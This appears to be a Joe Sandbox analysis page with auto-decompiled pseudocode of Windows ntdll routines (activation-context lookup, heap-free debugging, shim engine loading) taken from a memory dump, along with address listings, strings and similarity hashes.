						_v40 = 0;
						_v64 = 0;
						_v44 = 0;
						if(E34E6D580( &_v60,  &_v76,  &_v88,  &_v64) < 0) {
							goto L24;
						}
						_t151 = 0;
						if(0 < 0) {
							goto L24;
						}
						_t158 = _v88;
						if(_t158 < 0x28) {
							L34:
							_t254 = _v76;
							L91:
							_push(_t158);
							E34EDEF10(0x33, 0, "RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section\n", _t254);
							_t258 = _t258 + 0x14;
							_t151 = 0xc0150003;
							goto L24;
						}
						_t247 = _v64;
						while(1) {
							L12:
							_t254 = _v76;
							if( *_t254 != 0x64487347) {
								goto L91;
							}
							_t211 =  *((intOrPtr*)(_t254 + 0x14));
							_t160 = 1;
							if(_t211 == 0) {
								L19:
								_t225 =  *[fs:0x18];
								_t255 = _v44;
								_v92 = 0;
								_t247 = 0;
								_v68 = _t225;
								_t241 =  *(_t225 + 0x30);
								_v72 = _t241;
								L20:
								while(1) {
									if(_t255 <= 2) {
										_t163 = _t255;
										if(_t163 == 0) {
											_t164 =  *((intOrPtr*)(_t225 + 0x1a8));
											if(_t164 == 0) {
												L43:
												_t213 =  *((intOrPtr*)(_t241 + 0x1f8));
												_v92 = 0;
												if(_t213 == 0) {
													L28:
													_t213 =  *((intOrPtr*)(_t241 + 0x200));
													_v92 = 0xfffffffc;
													if(_t213 == 0) {
														goto L21;
													}
													_t255 = 3;
													_v44 = 3;
													L22:
													if(_t213 != 0) {
														_t241 = _v52;
														_t151 = E34E6A600(_t213, _v52, _v48,  &_v76,  &_v88);
														if(_t151 < 0) {
															if(_t151 != 0xc0150001 || _t255 == 3) {
																L32:
																if(_t151 < 0) {
																	if(_t151 != 0xc0150001) {
																		goto L24;
																	}
																	goto L23;
																}
																_t158 = _v88;
																if(_t158 >= 0x28) {
																	goto L12;
																}
																goto L34;
															} else {
																_t225 = _v68;
																_t241 = _v72;
																continue;
															}
														}
														_t241 = _v92;
														_v40 = (0 | _t241 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t241 == 0x00000000;
														asm("sbb edi, edi");
														_t247 =  ~(_t241 - 0xfffffffc) & _t241;
														_t151 = 0;
														goto L32;
													}
													L23:
													_t151 = 0xc0150008;
													goto L24;
												}
												_t255 = 2;
												_v44 = 2;
												goto L22;
											}
											_t170 =  *_t164;
											if(_t170 == 0) {
												goto L43;
											}
											_t171 =  *((intOrPtr*)(_t170 + 4));
											_v92 = _t171;
											if(_t171 == 0) {
												L83:
												if(_t213 == 0) {
													goto L43;
												}
												L84:
												_t255 = 1;
												_v44 = 1;
												goto L22;
											}
											if(_t171 != 0xfffffffc) {
												if(_t171 != 0xfffffffd) {
													_t213 =  *((intOrPtr*)(_t171 + 0x10));
													goto L83;
												}
												_t213 = "Actx ";
												goto L84;
											}
											_t213 =  *((intOrPtr*)(_t241 + 0x200));
											goto L83;
										}
										_t172 = _t163 - 1;
										if(_t172 == 0) {
											goto L43;
										}
										if(_t172 != 1) {
											goto L21;
										}
										goto L28;
									}
									L21:
									if(_t255 > 3) {
										_t151 = 0xc00000e5;
										goto L24;
									}
									goto L22;
								}
							}
							if( *((intOrPtr*)(_t254 + 8)) != 1) {
								_t160 = 0;
							}
							_t227 =  *((intOrPtr*)(_t254 + 0x1c));
							if(_t227 != 0) {
								if(_t160 == 0) {
									goto L16;
								}
								_v92 = 0;
								_t233 =  *((intOrPtr*)(_t227 + _t254 + 4)) +  *_v84 %  *(_t227 + _t254) * 8;
								_t234 = _t233 + _t254;
								_t201 =  *((intOrPtr*)(_t233 + _t254 + 4)) + _t254;
								_v72 = _t234;
								if( *_t234 <= 0) {
									goto L19;
								} else {
									goto L54;
								}
								while(1) {
									L54:
									_t214 =  *_t201 + _t254;
									_v68 = _t201 + 4;
									if(E34EA8050(_t214, _v84, 0x10) == 0x10) {
										goto L18;
									}
									_t205 = _v92 + 1;
									_v92 = _t205;
									_t201 = _v68;
									if(_t205 <  *_v72) {
										continue;
									}
									goto L19;
								}
							} else {
								L16:
								_t228 =  *((intOrPtr*)(_t254 + 0x18));
								if(( *(_t254 + 0x10) & 0x00000001) == 0) {
									_t174 = _t228 + _t254;
									_v92 = _t228 + _t254;
									while(E34EA8050(_t174, _v84, 0x10) != 0x10) {
										_t174 = _v92 + 0x1c;
										_v92 = _v92 + 0x1c;
										_t211 = _t211 - 1;
										if(_t211 != 0) {
											continue;
										}
										goto L19;
									}
									_t214 = _v92;
									L18:
									if(_t214 != 0) {
										if( *((intOrPtr*)(_t214 + 0x10)) == 0) {
											goto L19;
										}
										_t241 = _v80;
										if(_t241 != 0) {
											 *((intOrPtr*)(_t241 + 4)) =  *((intOrPtr*)(_t254 + 0xc));
											 *((intOrPtr*)(_t241 + 8)) =  *((intOrPtr*)(_t214 + 0x10)) + _t254;
											 *((intOrPtr*)(_t241 + 0xc)) =  *((intOrPtr*)(_t214 + 0x14));
											if(_t241 + 0x28 <=  *_t241 + _t241) {
												 *((intOrPtr*)(_t241 + 0x24)) =  *((intOrPtr*)(_t214 + 0x18));
											}
										}
										if((_t247 - 0x00000001 | 0x00000007) != 0xffffffff) {
											_t215 =  *((intOrPtr*)(_t247 + 0x14));
											if(_t215 != 0 && (( *(_t247 + 0x1c) & 0x00000008) == 0 || ( *(_t247 + 0x3c) & 0x00000008) == 0)) {
												_v93 = 0;
												 *0x34f491e0(3, _t247,  *((intOrPtr*)(_t247 + 0x10)),  *((intOrPtr*)(_t247 + 0x18)), 0,  &_v93);
												 *_t215();
												 *(_t247 + 0x1c) =  *(_t247 + 0x1c) | 0x00000008;
												_t241 = _v104;
												if(_v117 != 0) {
													 *(_t247 + 0x3c) =  *(_t247 + 0x3c) | 0x00000008;
												}
											}
										}
										if(_t241 == 0 || E34E54428(_a4, _t241, _t247,  &_v60, _t254,  *((intOrPtr*)(_t254 + 0x20)),  *((intOrPtr*)(_t254 + 0x24)), _v88) >= 0) {
											_t151 = 0;
										}
										goto L24;
									}
									goto L19;
								}
								_t242 = _v84;
								_v36 =  *_t242;
								_v32 =  *((intOrPtr*)(_t242 + 4));
								_v28 =  *((intOrPtr*)(_t242 + 8));
								_v24 =  *((intOrPtr*)(_t242 + 0xc));
								_t195 = E34E98170( &_v36, _t228 + _t254, _t211, 0x1c, E34E4B600);
								_t258 = _t258 + 0x14;
								_t214 = _t195;
							}
							goto L18;
						}
						goto L91;
					}
					goto L6;
				}
				if(_t209 == 0) {
					goto L49;
				}
				goto L5;
			}

0x34e6d698
0x34e6d6a2
0x34e6d6a6
0x34e6d6ad
0x34e6d6b1
0x34e6d6b4
0x34e6d6b8
0x34e6d6c3
0x34e6d6c7
0x34e6d6cb
0x34e6d90e
0x00000000
0x34eb913f
0x34eb913f
0x34e6d847
0x34e6d84b
0x34e6d84c
0x34e6d84d
0x34e6d858
0x34e6d858
0x34e6d90e
0x34e6d6d1
0x34e6d6d1
0x34e6d6db
0x34eb9164
0x34eb9164
0x00000000
0x34eb9164
0x34e6d6e1
0x34e6d6ea
0x00000000
0x00000000
0x34e6d6f3
0x34e6d8fc
0x34e6d701
0x34e6d704
0x00000000
0x00000000
0x34e6d70a
0x34e6d70d
0x34e6d922
0x00000000
0x00000000
0x34eb9149
0x34eb914e
0x34eb9153
0x34eb9158
0x34eb9158
0x34eb915a
0x34eb915c
0x34eb9161
0x00000000
0x34eb9161
0x34e6d713
0x34e6d716
0x34e6d936
0x00000000
0x00000000
0x34eb916e
0x34eb9173
0x34eb9178
0x00000000
0x34eb9178
0x34e6d71c
0x34e6d71f
0x34e6d723
0x34e6d72f
0x34e6d73c
0x34e6d745
0x34e6d749
0x34e6d751
0x34e6d759
0x34e6d768
0x00000000
0x00000000
0x34e6d76e
0x34e6d772
0x00000000
0x00000000
0x34e6d778
0x34e6d77f
0x34e6d8f1
0x34e6d8f1
0x34eb9370
0x34eb9370
0x34eb937b
0x34eb9380
0x34eb9383
0x00000000
0x34eb9383
0x34e6d785
0x34e6d790
0x34e6d790
0x34e6d790
0x34e6d79a
0x00000000
0x00000000
0x34e6d7a0
0x34e6d7a3
0x34e6d7a7
0x34e6d80d
0x34e6d80d
0x34e6d816
0x34e6d81c
0x34e6d820
0x34e6d822
0x34e6d826
0x34e6d829
0x00000000
0x34e6d830
0x34e6d833
0x34e6d85d
0x34e6d860
0x34eb92e0
0x34eb92e8
0x34e6d941
0x34e6d941
0x34e6d949
0x34e6d94f
0x34e6d874
0x34e6d874
0x34e6d87a
0x34e6d884
0x00000000
0x00000000
0x34e6d886
0x34e6d88b
0x34e6d83e
0x34e6d840
0x34e6d891
0x34e6d8a5
0x34e6d8ac
0x34eb933a
0x34e6d8dc
0x34e6d8de
0x34eb935b
0x00000000
0x00000000
0x00000000
0x34eb9361
0x34e6d8e4
0x34e6d8eb
0x00000000
0x00000000
0x00000000
0x34eb9349
0x34eb9349
0x34eb934d
0x00000000
0x34eb934d
0x34eb933a
0x34e6d8b2
0x34e6d8d2
0x34e6d8d6
0x34e6d8d8
0x34e6d8da
0x00000000
0x34e6d8da
0x34e6d842
0x34e6d842
0x00000000
0x34e6d842
0x34e6d955
0x34e6d95a
0x00000000
0x34e6d95a
0x34eb92ee
0x34eb92f2
0x00000000
0x00000000
0x34eb92f8
0x34eb92fb
0x34eb9301
0x34eb931f
0x34eb9321
0x00000000
0x00000000
0x34eb9327
0x34eb9327
0x34eb932c
0x00000000
0x34eb932c
0x34eb9306
0x34eb9313
0x34eb931c
0x00000000
0x34eb931c
0x34eb9315
0x00000000
0x34eb9315
0x34eb9308
0x00000000
0x34eb9308
0x34e6d866
0x34e6d869
0x00000000
0x00000000
0x34e6d872
0x00000000
0x00000000
0x00000000
0x34e6d872
0x34e6d835
0x34e6d838
0x34eb9366
0x00000000
0x34eb9366
0x00000000
0x34e6d838
0x34e6d830
0x34e6d7ad
0x34eb917f
0x34eb917f
0x34e6d7b3
0x34e6d7b8
0x34eb9188
0x00000000
0x00000000
0x34eb9194
0x34eb91a5
0x34eb91ac
0x34eb91ae
0x34eb91b0
0x34eb91b7
0x00000000
0x00000000
0x00000000
0x00000000
0x34eb91bd
0x34eb91bd
0x34eb91c8
0x34eb91ca
0x34eb91d7
0x00000000
0x00000000
0x34eb91e5
0x34eb91e6
0x34eb91ec
0x34eb91f0
0x00000000
0x00000000
0x00000000
0x34eb91f2
0x34e6d7be
0x34e6d7be
0x34e6d7c2
0x34e6d7c5
0x34eb91f7
0x34eb91fa
0x34eb91fe
0x34eb9213
0x34eb9216
0x34eb921a
0x34eb921d
0x00000000
0x00000000
0x00000000
0x34eb921f
0x34eb9224
0x34e6d805
0x34e6d807
0x34eb9231
0x00000000
0x00000000
0x34eb9237
0x34eb923d
0x34eb9244
0x34eb924e
0x34eb9254
0x34eb925c
0x34eb9261
0x34eb9261
0x34eb925c
0x34eb926d
0x34eb926f
0x34eb9274
0x34eb9286
0x34eb9299
0x34eb929f
0x34eb92a1
0x34eb92aa
0x34eb92ae
0x34eb92b0
0x34eb92b0
0x34eb92ae
0x34eb9274
0x34eb92b6
0x34eb92d9
0x34eb92d9
0x00000000
0x34eb92b6
0x00000000
0x34e6d807
0x34e6d7cb
0x34e6d7d9
0x34e6d7e0
0x34e6d7e7
0x34e6d7ee
0x34e6d7fb
0x34e6d800
0x34e6d803
0x34e6d803
0x00000000
0x34e6d7b8
0x00000000
0x34e6d790
0x00000000
0x34e6d902
0x34e6d6fb
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 34EB9299

Strings

RtlpFindActivationContextSection_CheckParameters, xrefs: 34EB914E, 34EB9173
Actx , xrefs: 34EB9315
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34EB9153
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34EB9178
GsHd, xrefs: 34E6D794
RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 34EB9372

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-2196497285
Opcode ID: 069487fb389d27b74eabbf2128a399c11811e6bade4ab480a54cb6538b14ee50
Instruction ID: 61c29c6f628b88ff44cd4ecec4306ac88c122cce081d737d14ca20e994fb8be0
Opcode Fuzzy Hash: 069487fb389d27b74eabbf2128a399c11811e6bade4ab480a54cb6538b14ee50
Instruction Fuzzy Hash: B3E1A374A08341CFEB10CF54C884B5AB7E4BF8835CF844A6DE89A9B291D775E944CF92

Uniqueness

Uniqueness Score: -1.00%

Function 34EFF8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E34EFF8F8(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t73;
				signed int _t75;
				signed int _t79;
				intOrPtr _t81;
				signed int _t82;
				signed char _t86;
				signed int _t87;
				intOrPtr _t89;
				intOrPtr _t93;
				intOrPtr _t103;
				signed int _t120;
				signed char _t131;
				intOrPtr _t133;
				signed int _t136;
				signed int _t151;
				signed int* _t154;
				signed int _t158;
				signed int* _t160;
				intOrPtr* _t164;
				void* _t165;

				_push(0x34);
				_push(0x34f2d2f8);
				L34EA7BE4(__ebx, __edi, __esi);
				 *(_t165 - 0x34) = __edx;
				_t162 = __ecx;
				 *((intOrPtr*)(_t165 - 0x30)) = __ecx;
				_t158 = 0;
				 *(_t165 - 0x28) = 0;
				 *((char*)(_t165 - 0x19)) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t165 - 4)) = 0;
					 *((intOrPtr*)(_t165 - 4)) = 1;
					_t73 = E34E47662("RtlFreeHeap");
					__eflags = _t73;
					if(_t73 == 0) {
						_t158 = 0;
						 *(_t165 - 0x28) = 0;
						L34:
						 *((intOrPtr*)(_t165 - 4)) = 0;
						 *((intOrPtr*)(_t165 - 4)) = 0xfffffffe;
						L34EFFBB7();
						_t75 = _t158;
						goto L35;
					}
					_t131 =  *(__ecx + 0x44) |  *(_t165 - 0x34);
					 *(_t165 - 0x2c) = _t131;
					 *(_t165 - 0x34) = _t131 | 0x10000000;
					__eflags = _t131 & 0x00000001;
					if((_t131 & 0x00000001) == 0) {
						E34E5FED0( *((intOrPtr*)(__ecx + 0xc8)));
						 *((char*)(_t165 - 0x19)) = 1;
						_t120 =  *(_t165 - 0x2c) | 0x10000001;
						__eflags = _t120;
						 *(_t165 - 0x34) = _t120;
					}
					E34F00835(_t162, 0);
					_t151 =  *((intOrPtr*)(_t165 + 8)) + 0xfffffff8;
					__eflags =  *((char*)(_t151 + 7)) - 5;
					if( *((char*)(_t151 + 7)) == 5) {
						_t151 = _t151 - (( *(_t151 + 6) & 0x000000ff) << 3);
						__eflags = _t151;
					}
					 *(_t165 - 0x24) = _t151;
					 *(_t165 - 0x2c) = _t151;
					_t133 = _t162;
					_t79 = E34E4753F(_t133, _t151, "RtlFreeHeap");
					__eflags = _t79;
					if(_t79 == 0) {
						goto L34;
					} else {
						__eflags =  *((intOrPtr*)(_t165 + 8)) -  *0x34f447d0; // 0x0
						_t81 =  *[fs:0x30];
						if(__eflags != 0) {
							_t82 =  *(_t81 + 0x68);
							 *(_t165 - 0x3c) = _t82;
							__eflags = _t82 & 0x00000800;
							if((_t82 & 0x00000800) == 0) {
								L32:
								_t158 = L34E63BC0(_t162,  *(_t165 - 0x34),  *((intOrPtr*)(_t165 + 8)));
								 *(_t165 - 0x28) = _t158;
								E34F00D24( *((intOrPtr*)(_t165 - 0x30)));
								E34F00835( *((intOrPtr*)(_t165 - 0x30)), 0);
								goto L34;
							}
							__eflags =  *0x34f447d4;
							if( *0x34f447d4 == 0) {
								goto L32;
							}
							_t160 =  *(_t165 - 0x2c);
							_t154 =  *(_t165 - 0x24);
							__eflags =  *(_t162 + 0x4c);
							if( *(_t162 + 0x4c) != 0) {
								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
								_t38 =  &(_t154[0]); // 0xffff
								_t39 =  &(_t154[0]); // 0xffffff
								__eflags = _t160[0] - ( *_t38 ^  *_t39 ^  *_t154);
								if(__eflags != 0) {
									_push(_t133);
									E34F0D646(0, _t162, _t160, _t160, _t162, __eflags);
									_t154 =  *(_t165 - 0x24);
								}
							}
							__eflags = _t160[0] & 0x00000002;
							if((_t160[0] & 0x00000002) == 0) {
								_t86 = _t160[0];
								 *(_t165 - 0x1a) = _t86;
								_t87 = _t86 & 0x000000ff;
							} else {
								_t103 = E34E83AE9(_t160);
								 *((intOrPtr*)(_t165 - 0x40)) = _t103;
								_t87 =  *(_t103 + 2) & 0x0000ffff;
							}
							_t136 = _t87;
							 *(_t165 - 0x20) = _t87;
							__eflags =  *(_t162 + 0x4c);
							if( *(_t162 + 0x4c) != 0) {
								_t51 =  &(_t154[0]); // 0xffff
								_t52 =  &(_t154[0]); // 0xffffff
								_t160[0] =  *_t51 ^  *_t52 ^  *_t154;
								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
								__eflags =  *_t160;
							}
							__eflags = _t136;
							if(_t136 != 0) {
								__eflags = _t136 -  *0x34f447d4; // 0x0
								if(__eflags != 0) {
									goto L32;
								}
								__eflags =  *((intOrPtr*)(_t162 + 0x7c)) -  *0x34f447d6; // 0x0
								if(__eflags != 0) {
									goto L32;
								}
								_t89 =  *[fs:0x30];
								__eflags =  *(_t89 + 0xc);
								if( *(_t89 + 0xc) == 0) {
									_push("HEAP: ");
									E34E4B910();
								} else {
									E34E4B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E34EF823A(_t162,  *(_t165 - 0x20)));
								E34E4B910("About to free block at %p with tag %ws\n",  *((intOrPtr*)(_t165 + 8)));
								L30:
								_t93 =  *[fs:0x30];
								__eflags =  *((char*)(_t93 + 2));
								if( *((char*)(_t93 + 2)) != 0) {
									 *0x34f447a1 = 1;
									 *0x34f44100 = 0;
									asm("int3");
									 *0x34f447a1 = 0;
								}
							}
							goto L32;
						}
						__eflags =  *(_t81 + 0xc);
						if( *(_t81 + 0xc) == 0) {
							_push("HEAP: ");
							E34E4B910();
						} else {
							E34E4B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						E34E4B910("About to free block at %p\n",  *0x34f447d0);
						goto L30;
					}
				} else {
					_t164 =  *0x34f43750; // 0x0
					 *0x34f491e0(__ecx, __edx,  *((intOrPtr*)(_t165 + 8)));
					_t75 =  *_t164() & 0x000000ff;
					L35:
					 *[fs:0x0] =  *((intOrPtr*)(_t165 - 0x10));
					return _t75;
				}
			}

0x34eff8f8
0x34eff8fa
0x34eff8ff
0x34eff906
0x34eff909
0x34eff90b
0x34eff910
0x34eff912
0x34eff915
0x34eff91f
0x34eff93e
0x34eff941
0x34eff94f
0x34eff954
0x34eff956
0x34effb8c
0x34effb8e
0x34effb91
0x34effb91
0x34effb94
0x34effb9b
0x34effba0
0x00000000
0x34effba0
0x34eff95f
0x34eff962
0x34eff96c
0x34eff96f
0x34eff972
0x34eff97a
0x34eff97f
0x34eff986
0x34eff986
0x34eff98b
0x34eff98b
0x34eff992
0x34eff99a
0x34eff99d
0x34eff9a1
0x34eff9aa
0x34eff9aa
0x34eff9aa
0x34eff9ac
0x34eff9af
0x34eff9b7
0x34eff9b9
0x34eff9be
0x34eff9c0
0x00000000
0x34eff9c6
0x34eff9c9
0x34eff9cf
0x34eff9d5
0x34effa1b
0x34effa1e
0x34effa21
0x34effa26
0x34effb2b
0x34effb37
0x34effb39
0x34effb41
0x34effb4b
0x00000000
0x34effb4b
0x34effa2c
0x34effa33
0x00000000
0x00000000
0x34effa39
0x34effa3c
0x34effa3f
0x34effa42
0x34effa47
0x34effa49
0x34effa4c
0x34effa51
0x34effa54
0x34effa56
0x34effa5b
0x34effa60
0x34effa60
0x34effa54
0x34effa63
0x34effa67
0x34effa79
0x34effa7c
0x34effa7f
0x34effa69
0x34effa6b
0x34effa70
0x34effa73
0x34effa73
0x34effa82
0x34effa84
0x34effa88
0x34effa8b
0x34effa8d
0x34effa90
0x34effa95
0x34effa9b
0x34effa9b
0x34effa9b
0x34effa9d
0x34effaa0
0x34effaa6
0x34effaad
0x00000000
0x00000000
0x34effab3
0x34effaba
0x00000000
0x00000000
0x34effabc
0x34effac2
0x34effac5
0x34effae4
0x34effae9
0x34effac7
0x34effadc
0x34effae1
0x34effafa
0x34effb03
0x34effb0b
0x34effb0b
0x34effb11
0x34effb15
0x34effb17
0x34effb1e
0x34effb24
0x34effb25
0x34effb25
0x34effb15
0x00000000
0x34effaa0
0x34eff9d7
0x34eff9da
0x34eff9f9
0x34eff9fe
0x34eff9dc
0x34eff9f1
0x34eff9f6
0x34effa0f
0x00000000
0x34effa15
0x34eff921
0x34eff926
0x34eff92e
0x34eff936
0x34effba2
0x34effba5
0x34effbb1
0x34effbb1

APIs

RtlDebugPrintTimes.NTDLL ref: 34EFF92E

Strings

About to free block at %p, xrefs: 34EFFA0A
HEAP: , xrefs: 34EFF9F9, 34EFFAE4
HEAP[%wZ]: , xrefs: 34EFF9EC, 34EFFAD7
RtlFreeHeap, xrefs: 34EFF948, 34EFF9B2
About to free block at %p with tag %ws, xrefs: 34EFFAFE

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
API String ID: 3446177414-3492000579
Opcode ID: d75cc22a4de9c2fc5b981de3b04754679cda3080e645e56a9b9a2d99548721c1
Instruction ID: 5931f5a08d252e684f65cc7a2f0805680b1fed28def79985d7b139b851bb9965
Opcode Fuzzy Hash: d75cc22a4de9c2fc5b981de3b04754679cda3080e645e56a9b9a2d99548721c1
Instruction Fuzzy Hash: FE712775A10A44EFEB01CFA8E8906ADFBF1FF49304F49815AE485AB751CB329941CF94

Uniqueness

Uniqueness Score: -1.00%

Function 34E46565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184
timeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E34E46565(intOrPtr* __ecx) {
				signed int _v8;
				char _v16;
				char _v92;
				char _v93;
				char _v100;
				signed short _v106;
				char _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t56;
				signed char _t67;
				intOrPtr _t76;
				signed char _t81;
				signed int _t86;
				signed int _t87;
				char _t88;
				intOrPtr _t103;
				signed int _t106;
				intOrPtr* _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t113;
				signed int _t114;
				intOrPtr* _t116;
				signed int _t117;
				void* _t118;

				_v8 =  *0x34f4b370 ^ _t117;
				_v93 = 1;
				_t110 = __ecx;
				E34E6E8A6(0, 0x4001,  &_v92);
				_t106 =  *0x7ffe0330;
				_t86 =  *0x34f49200; // 0x0
				_t113 = 0x20;
				 *0x34f465f8 = 1;
				_t92 = _t113 - (_t106 & 0x0000001f);
				asm("ror ebx, cl");
				_t87 = _t86 ^ _t106;
				if( *__ecx == 0) {
					L8:
					_t88 = _v93;
					L9:
					if(_v16 != 0) {
						E34E7E7E0(_t92, _v92);
					}
					_t114 =  *0x34f49210; // 0x0
					asm("ror esi, cl");
					 *0x34f491e0();
					 *(_t114 ^  *0x7ffe0330)();
					_t108 =  *0x7ffe0330;
					_t111 =  *0x34f49218; // 0x0
					_push(0x20);
					asm("ror edi, cl");
					_t112 = _t111 ^  *0x7ffe0330;
					E34E5FED0(0x34f432d8);
					_t98 = 0x34f45d8c;
					if( *0x34f465f0 != 0) {
						_t56 =  *0x34f45d8c; // 0x4c12ce0
						while(1) {
							__eflags = _t56 - _t98;
							if(_t56 == _t98) {
								break;
							}
							_v100 = _t56;
							_t39 = _t56 + 0x35;
							 *_t39 =  *(_t56 + 0x35) & 0x000000f7;
							__eflags =  *_t39;
							_t56 =  *_t56;
						}
						goto L11;
					} else {
						L11:
						_t116 =  *0x34f45d8c; // 0x4c12ce0
						if( *0x34f465f4 < 2) {
							_t116 =  *_t116;
						}
						if(_t116 == _t98) {
							L15:
							 *0x34f465f0 = 1;
							 *0x34f465f8 = 0;
							E34E5E740(_t98);
							E34E4676F(_t98);
							return L34E94B50(_t88, _t88, _v8 ^ _t117, _t108, _t112, _t116, 0x34f432d8);
						} else {
							do {
								_v100 = _t116;
								_t108 = _t112;
								_t24 = _t116 + 0x50; // 0x4c12ca8
								_t98 =  *_t24;
								E34E46704( *_t24, _t112);
								_t116 =  *_t116;
							} while (_t116 != 0x34f45d8c);
							goto L15;
						}
					}
				} else {
					goto L1;
				}
				do {
					L1:
					E34E95050(_t92,  &_v108, _t110);
					_t92 = L34E46B45( &_v108,  &_v92, 1,  &_v100);
					if(_t92 < 0) {
						_t67 =  *0x34f437c0; // 0x0
						__eflags = _t67 & 0x00000003;
						if((_t67 & 0x00000003) != 0) {
							_push(_t92);
							E34ECE692("minkernel\\ntdll\\ldrinit.c", 0x8ef, "LdrpLoadShimEngine", 0, "Loading the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
							_t67 =  *0x34f437c0; // 0x0
							_t118 = _t118 + 0x1c;
						}
						__eflags = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							asm("int3");
						}
						_v93 = 0;
						goto L6;
					}
					 *(_v100 + 0x34) =  *(_v100 + 0x34) | 0x00000100;
					E34E87DF6(_v100);
					_t76 = _v100;
					_t103 =  *((intOrPtr*)(_t76 + 0x50));
					_t122 =  *((intOrPtr*)(_t103 + 0x20)) - 7;
					if( *((intOrPtr*)(_t103 + 0x20)) != 7) {
						L5:
						 *0x34f491e0( *((intOrPtr*)(_t76 + 0x18)));
						 *_t87();
						_t92 = _v100;
						E34E6D3E1(_t87, _v100, _t113);
						goto L6;
					}
					_t113 = E34E716EE(_t87, _t103, _t110, _t113, _t122);
					if(_t113 < 0) {
						_t81 =  *0x34f437c0; // 0x0
						_t88 = 0;
						__eflags = _t81 & 0x00000003;
						if((_t81 & 0x00000003) != 0) {
							_push(_t113);
							E34ECE692("minkernel\\ntdll\\ldrinit.c", 0x909, "LdrpLoadShimEngine", 0, "Initializing the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
							_t81 =  *0x34f437c0; // 0x0
						}
						__eflags = _t81 & 0x00000010;
						if((_t81 & 0x00000010) != 0) {
							asm("int3");
						}
						_t92 = _t113;
						E34ED1D5E(_t113);
						_push(_t113);
						_push(0xffffffff);
						E34E92C70();
						_t113 = 0x20;
						goto L9;
					}
					_t76 = _v100;
					goto L5;
					L6:
					_t110 = _t110 + ((_v106 & 0x0000ffff) >> 1) * 2;
				} while ( *_t110 != 0);
				_t113 = 0x20;
				goto L8;
			}

0x34e46574
0x34e4657d
0x34e46581
0x34e4658b
0x34e46590
0x34e46598
0x34e465a3
0x34e465a6
0x34e465ad
0x34e465b1
0x34e465b3
0x34e465b8
0x34e46637
0x34e46637
0x34e4663a
0x34e4663e
0x34e466fa
0x34e466fa
0x34e4664c
0x34e46659
0x34e4665f
0x34e46665
0x34e46667
0x34e4666f
0x34e46678
0x34e4667d
0x34e46684
0x34e46686
0x34e46692
0x34e46697
0x34ea98c3
0x34ea98d3
0x34ea98d3
0x34ea98d5
0x00000000
0x00000000
0x34ea98ca
0x34ea98cd
0x34ea98cd
0x34ea98cd
0x34ea98d1
0x34ea98d1
0x00000000
0x34e4669d
0x34e4669d
0x34e466a4
0x34e466aa
0x34e466ac
0x34e466ac
0x34e466b0
0x34e466c9
0x34e466cb
0x34e466d7
0x34e466dc
0x34e466e1
0x34e466f6
0x34e466b2
0x34e466b2
0x34e466b2
0x34e466b5
0x34e466b7
0x34e466b7
0x34e466ba
0x34e466bf
0x34e466c1
0x00000000
0x34e466b2
0x34e466b0
0x00000000
0x00000000
0x00000000
0x34e465ba
0x34e465ba
0x34e465bf
0x34e465d5
0x34e465d9
0x34ea9835
0x34ea983a
0x34ea983c
0x34ea983e
0x34ea9859
0x34ea985e
0x34ea9863
0x34ea9863
0x34ea9866
0x34ea9868
0x34ea986a
0x34ea986a
0x34ea986d
0x00000000
0x34ea986d
0x34e465e2
0x34e465ec
0x34e465f1
0x34e465f4
0x34e465f7
0x34e465fb
0x34e4660f
0x34e46614
0x34e4661a
0x34e4661c
0x34e4661f
0x00000000
0x34e4661f
0x34e46602
0x34e46606
0x34ea9875
0x34ea987a
0x34ea987c
0x34ea987e
0x34ea9880
0x34ea989a
0x34ea989f
0x34ea98a4
0x34ea98a7
